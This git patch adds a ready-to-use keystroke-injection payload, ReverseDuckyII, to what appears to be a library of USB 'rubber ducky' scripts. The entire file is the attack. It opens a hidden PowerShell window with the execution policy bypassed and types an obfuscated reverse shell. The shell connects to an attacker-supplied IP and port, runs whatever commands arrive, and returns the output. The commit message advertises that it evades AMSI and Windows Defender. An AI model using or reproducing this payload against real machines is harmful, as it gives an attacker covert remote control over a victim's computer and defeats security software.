From 59cc824b0f6f785f01078d9e8a3ad12c7fc7035c Mon Sep 17 00:00:00 2001
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com>
Date: Thu, 5 Aug 2021 10:52:17 +0200
Subject: [PATCH] Uploaded ReverseDuckyII

ReverseDucky2 - A faster way to gain a reverse shell & easier to configure

Obfuscated Powershell code to bypass AMSI & Windows Defender.
---
 .../payloads/remote_access/ReverseDuckyII.txt | 35 +++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 library/payloads/remote_access/ReverseDuckyII.txt

diff --git a/library/payloads/remote_access/ReverseDuckyII.txt b/library/payloads/remote_access/ReverseDuckyII.txt
new file mode 100644
index 0000000..e43740b
--- /dev/null
+++ b/library/payloads/remote_access/ReverseDuckyII.txt
@@ -0,0 +1,35 @@
+REM       ReverseDucky2
+REM       Version 1.0
+REM       OS: Windows / Linux(?) (Not tested with Powershell on Linux)
+REM       Author: 0iphor13
+
+REM       Reverse shell executed in the background
+REM       Fill in Attacker-IP and Port in Line 19
+REM       DON'T FORGET TO START LISTENER
+
+
+DELAY 1500
+GUI r
+DELAY 500
+STRING powershell -NoP -NonI -W hidden -Exec Bypass
+DELAY 250
+ENTER
+
+DELAY 200
+STRING $IP='0.0.0.0';$Port=4444;$client = .('N'+'ew-O'+'bject') sYSteM.neT.soCKETs.TcPCLient
+DELAY 200
+STRING ($IP,$Port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|.('%'){0};while(($i = $s
+DELAY 200
+STRING tream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (.('Ne'+'w-O'+'bject') -TypeName SystE
+DELAY 200
+STRING M.tEXt.aSCiIEnCodinG).GetString($bytes,0, $i);$sendback = (.('i'+'ex') $data 2>&1 | .('Ou
+DELAY 200
+STRING t-'+'Str'+'in'+'g') );$sendback2 = $sendback + 'PS ' + (&('p'+'wd')).Path + '> ';$sendbyt
+DELAY 200
+STRING e = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Len
+DELAY 200
+STRING gth);$stream.Flush()};$client.Close()
+DELAY 100
+ENTER
+
+